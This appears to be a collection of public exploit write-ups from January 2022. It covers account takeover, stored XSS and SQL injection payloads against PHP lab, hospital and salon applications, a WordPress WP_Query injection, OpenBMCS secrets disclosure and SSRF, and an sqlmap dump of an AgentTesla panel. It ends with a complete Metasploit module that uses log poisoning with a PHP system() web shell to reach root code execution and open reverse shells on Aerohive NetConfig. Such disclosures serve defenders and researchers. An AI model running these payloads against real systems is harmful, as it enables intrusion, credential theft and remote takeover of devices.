<pre><code>#Exploit Title: Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)<br />#Date: 11/01/2022<br />#Exploit Author: Himash<br />#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip<br />#Version: 1.0<br />#Tested on: Kali Linux<br /><br /><br />Online Diagnostic Lab Management System 1.0 is vulnerable to unauthenticated account takeover.<br />An attacker can takeover any registered 'Staff' user account by just sending below POST request<br />By changing the the "id", "email", "password" and "cpass" parameters. <br /><br />#Steps to Reproduce<br /><br />1. Send the below POST request by changing "id", "email", "password" and "cpass" parameters.<br /><br />2. Log in to the user account by changed email and password.<br /><br />POST /odlms/classes/Users.php?f=save_client HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------218422725412817326673495861673<br />Content-Length: 1551<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/odlms/?page=user<br />Cookie: PHPSESSID=b17cc4d8837f564fc77d7b3e49b00d1e<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="id"<br /><br />2<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="firstname"<br /><br />Claire<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="middlename"<br /><br />C<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="lastname"<br /><br />Blake<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="gender"<br /><br />Female<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="dob"<br /><br />1997-10-14<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="contact"<br /><br />09456789123<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="address"<br /><br />Sample Address only<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="email"<br /><br />test@test.com<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="password"<br /><br />Test@1234<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="cpass"<br /><br />Test@1234<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------218422725412817326673495861673--<br /><br /></code></pre>
<pre><code>#Exploit Title: Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)<br />#Date: 11/01/2022<br />#Exploit Author: Himash<br />#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip<br />#Version: 1.0<br />#Tested on: Kali Linux<br /><br />Online Diagnostic Lab Management System 1.0 is vulnerable to stored cross-site-scripting.<br />Stored cross-site scripting (persistent XSS) arises when an application receives its data from<br />an untrusted source and includes that data within its responses in an unsafe way.<br /><br />#Steps to Reproduce<br /><br />1. Login to the admin account with username 'admin' and password 'admin123'<br /><br />2. Navigate to the 'User List' option <br /><br />3. Create new user by adding following payload in<br /> First Name and Last Name fields.<br /> <image src/onerror=prompt(document.cookie)><br /><br />4. XSS payload will be triggered in the page http://localhost/odlms/admin/?page=user/list<br /><br /></code></pre>
<pre><code>#Exploit Title: Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)<br />#Date: 11/01/2022<br />#Exploit Author: Himash<br />#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip<br />#Version: 1.0<br />#Tested on: Kali Linux 2021.4, PHP 7.2.34<br /><br />#SQL Injection<br />SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.<br />Online Diagnostic Lab Management System 1.0 is vulnerable to the SQL Injection in 'id' parameter of the 'appointment list' page.<br /><br />#Steps to reproduce <br /><br />Following URL is vulnerable to SQL Injection in the 'id' field.<br /><br />http://localhost/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test<br /><br />Server accepts the payload and the response get delayed by 7 seconds.<br /><br />#Impact<br /><br />An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap.<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection<br /># Date: 11/01/2022<br /># Exploit Author: Aryan Chehreghani<br /># Vendor Homepage: https://wordpress.org<br /># Software Link: https://wordpress.org/download/releases<br /># Version: < 5.8.3<br /># Tested on: Windows 10<br /># CVE : CVE-2022-21661<br /><br /># [ VULNERABILITY DETAILS ] : <br /><br />#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,<br />#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,<br />#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,<br />#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.<br /><br /># [ References ] : <br /><br />https://wordpress.org/news/category/releases<br />https://www.zerodayinitiative.com/advisories/ZDI-22-020<br />https://hackerone.com/reports/1378209<br /><br /># [ Sample Request ] :<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Upgrade-Insecure_Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: cross-site<br />Sec-Fetch-User: ?1<br />Cache-Control: max-age=0<br />Connection: close <br />Content-Type: application/x-www-form-urlencoded<br /><br />action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}<br /></code></pre>
<pre><code># Exploit Title: Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)<br /># Exploit Author: (Sant268)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html<br /># Version: HPRMS 1.0<br /># Tested on: Ubuntu 20, Apache<br /><br />- Description:<br />A Stored XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.<br /><br />- Payload used:<br /><img src =q onerror=prompt(8)><br /><br />- Steps to reproduce:<br />1- Go to http://victim.com/admin/?page=doctors<br />2- Add a Doctor, paste the payload in specialization<br />3- Alert will pop whenever the page is accessed.<br /><br /><br /><br />----<br /><br /><br /># Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS)<br /># Exploit Author: (Sant268)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html<br /># Version: HPRMS 1.0<br /># Tested on: Ubuntu 20, Apache<br /><br />- Description:<br />A XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.<br /><br />- Payload used:<br /><img src =q onerror=prompt(8)><br /><br />- Steps to reproduce:<br />1- Go to http://victim.com/admin/?page=room_list<br />2- Add Room type, paste the payload in description<br />3- Alert will pop whenever the page is accessed.<br /><br /><br />----<br /><br /># Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS)<br /># Exploit Author: (Sant268)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html<br /># Version: HPRMS 1.0<br /># Tested on: Ubuntu 20, Apache<br /><br />- Description:<br />A XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.<br /><br />- Payload used:<br /><img src =q onerror=prompt(8)><br /><br />- Steps to reproduce:<br />1- Go to http://victim.com/admin/?page=room_types<br />2- Add Room type, paste the payload in description<br />3- Alert will pop whenever the page is accessed.<br /><br /><br /></code></pre>
<pre><code># Exploit Title: SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)<br /># Exploit Author: Betul Denizler<br /># Vendor Homepage: https://salonerp.sourceforge.io/<br /># Software Link: https://sourceforge.net/projects/salonerp/files/latest/download<br /># Version: SalonERP v3.0.1<br /># Tested on: Ubuntu Mate 20.04<br /># Vulnerable Parameter: sql<br /># Date: 11/01/2022<br />'''<br />DESCRIPTION<br />========<br />The vulnerability allows an attacker to inject payload using 'sql' parameter in sql query while generating report. Upon successful discovering the login admin password hash, it can be decrypted and obtained the plain-text password.<br /><br /><br />POC REQUEST:<br />========<br />POST /salonerp/report.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 755<br />Origin: http://127.0.0.1<br />Connection: close<br />Cookie: salonerp-id=vDF9uCpfqQAXuNhsCWvH; PHPSESSID=e170a8c9dfeef78751cb49b9977b2373<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />save=&title=bestCustomers&font=Times&fontSize=12&sql=SELECT%0A%09%09%09%09%09%09(select+concat(u.name%2C'+'%2Cu.password)+from+Models%5CUser+u+where+u.id+%3D+1)+AS+userpass%2C%0A%09%09%09%09%09%09COUNT(i.id)+AS+amount%2C%0A%09%09%09%09%09%09SUM(i.cash+%2B+i.bank)+as+revenue%0A%09%09%09%09%09FROM+Models%5CInvoice+i%0A%09%09%09%09%09JOIN+i.event+e%0A%09%09%09%09%09JOIN+e.customer+c%0A%09%09%09%09%09WHERE+DATE_DIFF(i.date%2C+%3AstartDate)+%3E%3D+0%0A%09%09%09%09%09AND+DATE_DIFF(i.date%2C+%3AendDate)+%3C%3D+0%0A%09%09%09%09%09GROUP+BY+e.customer%0A%09%09%09%09%09ORDER+BY+revenue+DESC&ask%5B0%5D%5Bname%5D=startDate&ask%5B0%5D%5Bvalue%5D=2021-12-14T00%3A00%3A00&ask%5B1%5D%5Bname%5D=endDate&ask%5B1%5D%5Bvalue%5D=2021-12-15T00%3A00%3A00&currency%5B%5D=2<br /><br />EXPLOITATION<br />========<br />1. Create a database and login panel<br />2. Create employees in the settings<br />3. Create Products, Customers and Events<br />4. Pay for Products on Event<br />5. Create report on the "Reports" menu<br />6. Inject payload to the "sql" parameter in POST request for generate report<br /><br />Payload: (select+concat(u.name,'+',u.password)+from+Models\User+u+where+u.id+=+1)+AS+userpass<br />'''<br /></code></pre>
<pre><code><br />OpenBMCS 2.4 Secrets Disclosure<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: The application allows directory listing and information disclosure of<br />some sensitive files that can allow an attacker to leverage the disclosed<br />information and gain full BMS access.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5695<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br />https://192.168.1.222/debug/<br /><br />Index of /debug<br /><br />change_password_sqls<br />clear_all_watches.php<br />controllerlog/<br />dash/<br />dodgy.php<br />fix_out.php<br />graphics/<br />graphics_diag.php<br />graphics_ip_diag/<br />jace_info.php<br />kits/<br />mysession.php<br />nuke.php<br />obix_test.php<br />print_tree.php<br />reboot_backdoor.php<br />rerunSQLUpdates.php<br />reset_alarm_trigger_times.php<br />system/<br />test_chris_obix.php<br />timestamp.php<br />tryEmail.php<br />trysms.php<br />unit_testing/<br />userlog/<br /><br />...<br />...<br /><br />/cache/<br />/classes/<br />/config/<br />/controllers/<br />/core/<br />/css/<br />/display/<br />/fonts/<br />/images/<br />/js/<br />/php/<br />/plugins/<br />/sounds/<br />/temp/<br />/tools/<br />/core/assets/<br />/core/backup/<br />/core/crontab/<br />/core/font/<br />/core/fonts/<br />/core/license/<br />/core/load/<br />/core/logout/<br />/core/password/<br />/php/audit/<br />/php/phpinfo.php<br />/php/temp/<br />/php/templates/<br />/php/test/<br />/php/weather/<br />/plugins/alarms/<br />/tools/phpmyadmin/index.php<br />/tools/migrate.php<br /></code></pre>
<pre><code><br />OpenBMCS 2.4 Unauthenticated SSRF / RFI<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include<br />(RFI) vulnerability exists in OpenBMCS within its functionalities. The application<br />parses user supplied data in the POST parameter 'ip' to query a server IP on port<br />81 by default. Since no validation is carried out on the parameter, an attacker<br />can specify an external domain and force the application to make an HTTP request<br />to an arbitrary destination host. This can be used by an external attacker for<br />example to bypass firewalls and initiate a service and network enumeration on the<br />internal network through the affected application, allows hijacking the current<br />session of the user, execute cross-site scripting code or changing the look of<br />the page and content modification on current display.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5694<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br />POST /php/query.php HTTP/1.1<br />Host: 192.168.1.222<br />Content-Length: 29<br />Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />ip=www.columbia.edu:80&argu=/<br /><br /><br />HTTP/1.1 302 Found<br />Date: Tue, 14 Dec 2021 20:26:47 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: ../login.php<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 32141<br /><br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br /><html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><br /><br /><!-- developed by CUIT --><br /><!-- 08/28/18, 8:55:54am --><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br /><meta http-equiv="X-UA-Compatible" content="IE=edge" ><br /><meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" /><br /><title>Columbia University in the City of New York</title><br />...<br />...<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/db9629508fda139f71f625d764c7eff7_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: AgentTesla Builder Web Panel<br />Vulnerability: SQL Injection<br />Description: The AgentTeslaBuilder WebUI uses ionCube to encode and protect its PHP code. However, the parameter 'table' is vulnerable to post-auth SQL Injection. Authenticated users can easily dump all databases, tables and contents including the MySQL database schema. Manually testing the panel I identified an SQL error probing the following URL /AgentTeslaBuilder/server_side/scripts/server_processing.php?table=%27HELL%20OR%201=1 which gave me "An SQL error occurred: SQLSTATE[42S02] Base table or view not found 1146 Table 'agenttesla.'hell or 1=1' doesn't exist" Then switched to use Sqlmap to do the heavy lifting.<br /><br />Database: agenttesla<br />Table: passwords<br />[1 entry]<br />+--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+<br />| hwid | password_id | pwd | host | status | client | time | pc_name | username | server_time |<br />+--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+<br />| 939394 | 1 | abc123 | x.x.x.x | 1 | windows | 2022-01-17 01:06:09 | tom | nubarr | 2022-01-17 01:06:09 |<br />+--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+<br /><br />Type: WebUI<br />MD5: db9629508fda139f71f625d764c7eff7 : "Agent Tesla.exe"<br />MD5: 978509c2a3d051b43e53bba1436b7076 : "login.php"<br />Vuln ID: MVID-2022-0455<br />Disclosure: 01/16/2022<br /><br />Exploit/PoC:<br />sqlmap.py -u "http://AGENT-TESLA-IP/AgentTeslaBuilder/server_side/scripts/server_processing.php?table=passwords --auth=admin:abc123" --dbms=MySQL --dump<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE',<br /> 'Description' => %q{<br /> This module exploits LFI and log poisoning vulnerabilities<br /> (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a<br /> build-242466 and older in order to achieve unauthenticated remote<br /> code execution as the root user. NetConfig is the Aerohive/Extreme<br /> Networks HiveOS administrative webinterface. Vulnerable versions<br /> allow for LFI because they rely on a version of PHP 5 that is<br /> vulnerable to string truncation attacks. This module leverages this<br /> issue in conjunction with log poisoning to gain RCE as root.<br /><br /> Upon successful exploitation, the Aerohive NetConfig application<br /> will hang for as long as the spawned shell remains open. Closing<br /> the session should render the app responsive again.<br /><br /> The module provides an automatic cleanup option to clean the log.<br /> However, this option is disabled by default because any modifications<br /> to the /tmp/messages log, even via sed, may render the target<br /> (temporarily) unexploitable. This state can last over an hour.<br /><br /> This module has been successfully tested against Aerohive NetConfig<br /> versions 8.2r4 and 10.0r7a.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Erik de Jong', # github.com/eriknl - discovery and PoC<br /> 'Erik Wynter' # @wyntererik - Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2020-16152'], # still categorized as RESERVED<br /> ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code<br /> ],<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Platform' => %w[linux unix],<br /> 'Arch' => [ ARCH_ARMLE, ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Linux', {<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Platform' => 'linux',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',<br /> 'CMDSTAGER::FLAVOR' => 'curl'<br /> }<br /> }<br /> ],<br /> [<br /> 'CMD', {<br /> 'Arch' => [ARCH_CMD],<br /> 'Platform' => 'unix',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2020-02-17',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options [<br /> OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']),<br /> OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]),<br /> ]<br /> end<br /><br /> def auto_clean_log<br /> datastore['AUTO_CLEAN_LOG']<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'index.php5')<br /> })<br /><br /> unless res<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res.code == 200 && res.body.include?('Aerohive NetConfig UI')<br /> return CheckCode::Safe('Target is not an Aerohive NetConfig application.')<br /> end<br /><br /> version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first<br /> unless version<br /> return CheckCode::Detected('Could not determine Aerohive NetConfig version.')<br /> end<br /><br /> begin<br /> if Rex::Version.new(version) <= Rex::Version.new('10.0r8a')<br /> return CheckCode::Appears("The target is Aerohive NetConfig version #{version}")<br /> else<br /> print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.')<br /> return CheckCode::Safe("The target is Aerohive NetConfig version #{version}")<br /> end<br /> rescue StandardError => e<br /> return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}")<br /> end<br /> end<br /><br /> def poison_log<br /> password = rand_text_alphanumeric(8..12)<br /> @shell_cmd_name = rand_text_alphanumeric(3..6)<br /> @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>"<br /><br /> # Poison /tmp/messages<br /> print_status('Attempting to poison the log at /tmp/messages...')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'login.php5'),<br /> 'vars_post' => {<br /> 'login_auth' => 0,<br /> 'miniHiveUI' => 1,<br /> 'authselect' => 'Name/Password',<br /> 'userName' => @poison_cmd,<br /> 'password' => password<br /> }<br /> })<br /><br /> unless res<br /> fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages')<br /> end<br /><br /> unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==')<br /> fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages')<br /> end<br /><br /> print_status('Server responded as expected. Continuing...')<br /> end<br /><br /> def on_new_session(session)<br /> log_cleaned = false<br /> if auto_clean_log<br /> print_status('Attempting to clean the log file at /tmp/messages...')<br /> print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.')<br /> begin<br /> # We need remove the line containing the PHP system call from /tmp/messages<br /> # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username.<br /> # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line<br /> # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same:<br /> # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period.<br /> line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}"<br /> clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}"<br /> cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\<br /> "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}"<br /><br /> if session.type.to_s.eql? 'meterpreter'<br /> session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'<br /><br /> session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"")<br /><br /> # Wait for cleanup<br /> Rex.sleep 5<br /><br /> # Check for the PHP system call in /tmp/messages<br /> messages_contents = session.fs.file.open('/tmp/messages').read.to_s<br /> # using =~ here produced unexpected results, so include? is used instead<br /> unless messages_contents.include?(@poison_cmd)<br /> log_cleaned = true<br /> end<br /> elsif session.type.to_s.eql?('shell')<br /> session.shell_command_token(cmds_to_clean_log.to_s)<br /><br /> # Check for the PHP system call in /tmp/messages<br /> poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'")<br /> # using =~ here produced unexpected results, so include? is used instead<br /> unless poison_evidence.include?(@poison_cmd)<br /> log_cleaned = true<br /> end<br /> end<br /> rescue StandardError => e<br /> print_error("Error during cleanup: #{e.message}")<br /> ensure<br /> super<br /> end<br /><br /> unless log_cleaned<br /> print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages")<br /> end<br /> end<br /><br /> if log_cleaned<br /> print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.')<br /> else<br /> print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}")<br /> print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.')<br /> print_warning('Deleting /tmp/messages or clearing out the file may break the application.')<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> print_status('Attempting to execute the payload')<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'action.php5'),<br /> 'vars_get' => {<br /> '_action' => 'list',<br /> 'debug' => 'true'<br /> },<br /> 'vars_post' => {<br /> '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation<br /> @shell_cmd_name => cmd<br /> }<br /> }, 0)<br /><br /> print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.')<br /> end<br /><br /> def exploit<br /> poison_log<br /> if target.arch.first == ARCH_CMD<br /> print_status('Executing the payload')<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager(background: true)<br /> end<br /> end<br />end<br /></code></pre>